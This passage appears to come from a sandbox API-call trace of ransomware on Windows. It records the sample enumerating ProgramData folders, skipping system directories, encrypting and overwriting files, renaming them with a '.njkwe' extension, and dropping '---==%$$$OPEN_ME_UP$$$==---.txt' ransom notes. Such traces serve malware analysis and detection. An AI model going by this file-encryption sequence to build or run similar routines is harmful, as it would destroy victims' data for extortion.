[0073.834] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edb.log") returned 55 [0073.834] StrStrIW (lpFirst="edb.log", lpSrch=".njkwe") returned 0x0 [0073.834] lstrcmpW (lpString1="edb.log", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.834] lstrcmpW (lpString1="edb.log", lpString2="taridd") returned -1 [0073.834] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edb.log", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.834] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edb.log" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\edb.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.835] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5e4d293, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc5e4d293, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xc5e734dc, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x140000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="edbres00001.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1 [0073.835] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Windows") returned -1 [0073.835] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="$Recycle.bin") returned 1 [0073.835] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="System Volume Information") returned -1 [0073.835] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Program Files") returned -1 [0073.835] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Program Files (x86)") returned -1 [0073.835] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbres00001.jrs") returned 63 [0073.835] StrStrIW (lpFirst="edbres00001.jrs", lpSrch=".njkwe") returned 0x0 [0073.835] lstrcmpW (lpString1="edbres00001.jrs", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.835] lstrcmpW (lpString1="edbres00001.jrs", lpString2="taridd") returned -1 [0073.835] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbres00001.jrs", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.835] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbres00001.jrs" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\edbres00001.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.835] GetTickCount () returned 0x1152d08 [0073.835] GetTickCount () returned 0x1152d08 [0073.835] GetTickCount () returned 0x1152d08 [0073.835] GetTickCount () returned 0x1152d08 [0073.835] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0073.835] GetProcessHeap () returned 0xbe0000 [0073.835] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0073.836] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0073.838] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.838] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0073.838] GetProcessHeap () returned 0xbe0000 [0073.838] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0073.838] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.838] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0073.989] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0073.989] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0073.989] CloseHandle (hObject=0x434) returned 1 [0073.990] GetProcessHeap () returned 0xbe0000 [0073.990] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.990] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbres00001.jrs_r00t_{3sXlE5}.njkwe") returned 83 [0073.990] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbres00001.jrs" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\edbres00001.jrs"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbres00001.jrs_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\edbres00001.jrs_r00t_{3sxle5}.njkwe")) returned 1 [0073.991] GetProcessHeap () returned 0xbe0000 [0073.991] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.991] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5e734dc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc5e734dc, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xc5e734dc, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x140000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="edbres00002.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1 [0073.991] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Windows") returned -1 [0073.992] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="$Recycle.bin") returned 1 [0073.992] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="System Volume Information") returned -1 [0073.992] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Program Files") returned -1 [0073.992] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Program Files (x86)") returned -1 [0073.992] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbres00002.jrs") returned 63 [0073.992] StrStrIW (lpFirst="edbres00002.jrs", lpSrch=".njkwe") returned 0x0 [0073.992] lstrcmpW (lpString1="edbres00002.jrs", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.992] lstrcmpW (lpString1="edbres00002.jrs", lpString2="taridd") returned -1 [0073.992] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbres00002.jrs", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.992] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbres00002.jrs" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\edbres00002.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.992] GetTickCount () returned 0x1152da4 [0073.992] GetTickCount () returned 0x1152da4 [0073.992] GetTickCount () returned 0x1152da4 [0073.992] GetTickCount () returned 0x1152da4 [0073.992] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0073.993] GetProcessHeap () returned 0xbe0000 [0073.993] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0073.993] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0073.996] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.996] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0073.996] GetProcessHeap () returned 0xbe0000 [0073.996] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0073.996] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.996] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0074.021] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0074.021] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0074.021] CloseHandle (hObject=0x434) returned 1 [0074.022] GetProcessHeap () returned 0xbe0000 [0074.022] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0074.022] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbres00002.jrs_r00t_{3sXlE5}.njkwe") returned 83 [0074.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbres00002.jrs" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\edbres00002.jrs"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbres00002.jrs_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\edbres00002.jrs_r00t_{3sxle5}.njkwe")) returned 1 [0074.022] GetProcessHeap () returned 0xbe0000 [0074.022] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0074.022] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5e26fff, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc5e4d293, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xc63d09b3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x140000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="edbtmp.log", cAlternateFileName="")) returned 1 [0074.022] lstrcmpiW (lpString1="edbtmp.log", lpString2="Windows") returned -1 [0074.022] lstrcmpiW (lpString1="edbtmp.log", lpString2="$Recycle.bin") returned 1 [0074.022] lstrcmpiW (lpString1="edbtmp.log", lpString2="System Volume Information") returned -1 [0074.022] lstrcmpiW (lpString1="edbtmp.log", lpString2="Program Files") returned -1 [0074.022] lstrcmpiW (lpString1="edbtmp.log", lpString2="Program Files (x86)") returned -1 [0074.022] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbtmp.log") returned 58 [0074.022] StrStrIW (lpFirst="edbtmp.log", lpSrch=".njkwe") returned 0x0 [0074.022] lstrcmpW (lpString1="edbtmp.log", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.022] lstrcmpW (lpString1="edbtmp.log", lpString2="taridd") returned -1 [0074.022] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbtmp.log", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.022] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbtmp.log" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\edbtmp.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0074.023] GetTickCount () returned 0x1152dc3 [0074.023] GetTickCount () returned 0x1152dc3 [0074.023] GetTickCount () returned 0x1152dc3 [0074.023] GetTickCount () returned 0x1152dc3 [0074.023] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0074.023] GetProcessHeap () returned 0xbe0000 [0074.023] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0074.023] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0074.125] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.125] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0074.126] GetProcessHeap () returned 0xbe0000 [0074.126] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0074.126] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.126] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0074.126] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0074.127] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0074.127] CloseHandle (hObject=0x434) returned 1 [0074.127] GetProcessHeap () returned 0xbe0000 [0074.127] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0074.127] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbtmp.log_r00t_{3sXlE5}.njkwe") returned 78 [0074.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbtmp.log" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\edbtmp.log"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edbtmp.log_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\edbtmp.log_r00t_{3sxle5}.njkwe")) returned 1 [0074.127] GetProcessHeap () returned 0xbe0000 [0074.127] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0074.127] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc5e99732, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc5e99732, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3a36a3f2, ftLastWriteTime.dwHighDateTime=0x1d5c439, nFileSizeHigh=0x0, nFileSizeLow=0x140000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="qmgr.db", cAlternateFileName="")) returned 1 [0074.127] lstrcmpiW (lpString1="qmgr.db", lpString2="Windows") returned -1 [0074.127] lstrcmpiW (lpString1="qmgr.db", lpString2="$Recycle.bin") returned 1 [0074.127] lstrcmpiW (lpString1="qmgr.db", lpString2="System Volume Information") returned -1 [0074.127] lstrcmpiW (lpString1="qmgr.db", lpString2="Program Files") returned 1 [0074.128] lstrcmpiW (lpString1="qmgr.db", lpString2="Program Files (x86)") returned 1 [0074.128] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db") returned 55 [0074.128] StrStrIW (lpFirst="qmgr.db", lpSrch=".njkwe") returned 0x0 [0074.128] lstrcmpW (lpString1="qmgr.db", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.128] lstrcmpW (lpString1="qmgr.db", lpString2="taridd") returned -1 [0074.128] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.128] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.128] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5e734dc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc5e734dc, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x576d0867, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="qmgr.jfm", cAlternateFileName="")) returned 1 [0074.128] lstrcmpiW (lpString1="qmgr.jfm", lpString2="Windows") returned -1 [0074.128] lstrcmpiW (lpString1="qmgr.jfm", lpString2="$Recycle.bin") returned 1 [0074.128] lstrcmpiW (lpString1="qmgr.jfm", lpString2="System Volume Information") returned -1 [0074.128] lstrcmpiW (lpString1="qmgr.jfm", lpString2="Program Files") returned 1 [0074.128] lstrcmpiW (lpString1="qmgr.jfm", lpString2="Program Files (x86)") returned 1 [0074.128] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.jfm") returned 56 [0074.128] StrStrIW (lpFirst="qmgr.jfm", lpSrch=".njkwe") returned 0x0 [0074.128] lstrcmpW (lpString1="qmgr.jfm", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.128] lstrcmpW (lpString1="qmgr.jfm", lpString2="taridd") returned -1 [0074.128] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.jfm", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.128] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.jfm" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.jfm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.129] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5e734dc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc5e734dc, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x576d0867, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="qmgr.jfm", cAlternateFileName="")) returned 0 [0074.129] FindClose (in: hFindFile=0xc19de0 | out: hFindFile=0xc19de0) returned 1 [0074.129] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 79 [0074.129] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.130] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0074.131] CloseHandle (hObject=0x430) returned 1 [0074.131] GetProcessHeap () returned 0xbe0000 [0074.131] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0074.131] FindNextFileW (in: hFindFile=0xc19da0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17cbb4ff, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc6206d3e, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xc6206d3e, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 0 [0074.131] FindClose (in: hFindFile=0xc19da0 | out: hFindFile=0xc19da0) returned 1 [0074.131] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 68 [0074.132] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\network\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.132] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0074.133] CloseHandle (hObject=0x42c) returned 1 [0074.133] GetProcessHeap () returned 0xbe0000 [0074.133] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0074.133] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1c05089, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xc1c05089, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xc1c05089, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Office", cAlternateFileName="")) returned 1 [0074.133] lstrcmpiW (lpString1="Office", lpString2="Windows") returned -1 [0074.133] lstrcmpiW (lpString1="Office", lpString2="$Recycle.bin") returned 1 [0074.133] lstrcmpiW (lpString1="Office", lpString2="System Volume Information") returned -1 [0074.133] lstrcmpiW (lpString1="Office", lpString2="Program Files") returned -1 [0074.134] lstrcmpiW (lpString1="Office", lpString2="Program Files (x86)") returned -1 [0074.134] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Office") returned 35 [0074.134] lstrcmpW (lpString1="Office", lpString2=".") returned 1 [0074.134] lstrcmpW (lpString1="Office", lpString2="..") returned 1 [0074.134] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Office", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0074.134] GetProcessHeap () returned 0xbe0000 [0074.134] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0074.134] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\*") returned 37 [0074.134] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\*", 